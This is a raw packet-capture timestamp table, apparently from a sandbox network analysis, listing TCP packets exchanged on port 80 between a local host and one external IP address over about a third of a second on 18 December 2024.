                                                                              Dec 18, 2024 21:00:36.014689922 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.014759064 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.016870975 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.016925097 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.017479897 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.019382954 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.019743919 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.019799948 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.021756887 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.021815062 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.022161961 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.024374008 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.024422884 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.024729967 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.026737928 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.026792049 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.109067917 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.109282017 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.109338999 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.109493017 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.110321045 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.110374928 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.111413002 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.111915112 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.112056971 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.113401890 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.113857031 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.113912106 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.115364075 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.115772009 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.115834951 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.117419004 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.117896080 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.119307041 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.119671106 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.119746923 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.121139050 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.121577024 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.122982025 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.123112917 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.123378038 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.123836040 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.124824047 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.125338078 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.125674009 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.126676083 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.127094030 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.127145052 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.128541946 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.128942013 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.129084110 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.130353928 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.130682945 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.130737066 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.132107019 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.132517099 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.132648945 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.133867979 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.134376049 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.134435892 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.135636091 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.136038065 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.136363983 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.137502909 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.137907028 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.137999058 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.139127016 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.139758110 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.139806032 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.140954018 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.141381025 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.141438007 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.142865896 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.143223047 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.143299103 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.144315004 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.144774914 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.144835949 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.146023989 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.146418095 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.146681070 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.147281885 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.148047924 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.148818970 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.149317980 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.149336100 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.149391890 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.150470018 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.150487900 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.150536060 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.152062893 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.152080059 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.152134895 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.153841972 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.153860092 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.153912067 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.155373096 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.155389071 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.155453920 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.157043934 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.157061100 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.157134056 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.158879995 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.158895969 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.158946991 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.160576105 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.161211014 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.161264896 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.162538052 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.162554026 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.162594080 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.162602901 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.164585114 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.164606094 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.164637089 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.166265011 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.166285038 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.166322947 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.167973042 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.167990923 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.168030977 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.169878006 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.169894934 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.169913054 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.169984102 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.171287060 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.171304941 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.171356916 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.173088074 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.173105001 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.173166037 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.174887896 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.174905062 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.174977064 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.176764011 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.176780939 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.176826000 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.178561926 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.178580046 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.178596020 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.178675890 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.180198908 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.180219889 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.180248976 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.181968927 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.181986094 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.182045937 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.183778048 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.183799028 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.183847904 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.185565948 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.185584068 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.185600042 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.185631990 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.185662031 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.187369108 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.187386990 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.187443018 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.189395905 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.189412117 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.189476967 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.190891981 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.190907001 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.190968990 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.192723989 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.192740917 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.192800999 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.194453955 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.194469929 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.194483995 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.194534063 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.196234941 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.196250916 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.196288109 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.198066950 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.198085070 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.198129892 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.199837923 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.199855089 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.199907064 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.201647043 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.201663017 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.201678991 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.201714039 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.201726913 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.301379919 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.301599979 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.301721096 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.302459955 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.303256035 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.303272009 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.303303003 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.304486036 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.304541111 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.305298090 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.305314064 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.305366993 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.306968927 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.306984901 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.307043076 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.308538914 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.308556080 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.308599949 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.310195923 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.310210943 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.310250044 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.311882973 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.311902046 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.311949968 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.313653946 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.313671112 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.313731909 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.315510035 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.315526009 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.315582037 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.317286015 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.317301989 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.317317009 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.317347050 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.319063902 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.319080114 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.319124937 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.320823908 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.320839882 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.320887089 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.322721004 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.322740078 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.322778940 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.324378967 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.324397087 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.324412107 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.324434996 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.324455023 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.326224089 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.326241016 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.326287031 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.327888966 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.327904940 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.327954054 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.329794884 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.329812050 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.329859972 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.331518888 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.331535101 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.331587076 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.333254099 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.333271027 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.333287001 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.333333969 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.335256100 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.335272074 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.335331917 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.336831093 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.336848021 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.336909056 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.338608027 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.338625908 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.338665962 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.340406895 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.340425014 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.340440035 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.340481997 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.340528011 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.342211962 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.342228889 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.342278004 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.343928099 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.343946934 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.344013929 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.345890045 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.345907927 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.346044064 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.347645998 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.347662926 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.347711086 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.349273920 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.349289894 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.349345922 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.349391937 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.351278067 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.351294041 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.351423025 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.352991104 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.353008986 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.353060961 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.354669094 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.354686022 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.354717016 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.356477022 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.356493950 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.356508970 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.356544018 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.356590986 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.358253002 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.358273983 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.358350039 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.360004902 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.360022068 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.360078096 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.361887932 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.361905098 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.361974955 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.364891052 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.364907980 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.364978075 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.365309000 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.365324974 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.365339994 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.365386963 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.367321968 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.367341995 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.367391109 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.369096994 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.369121075 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.369168043 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.370748997 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.370765924 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.370811939 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.372464895 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.372481108 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.372494936 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.372529030 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.372566938 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.374840975 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.374857903 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.375008106 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.376045942 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.376061916 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.376120090 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.377810001 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.377826929 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.377931118 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.380068064 CET8049753139.99.188.124192.168.2.4
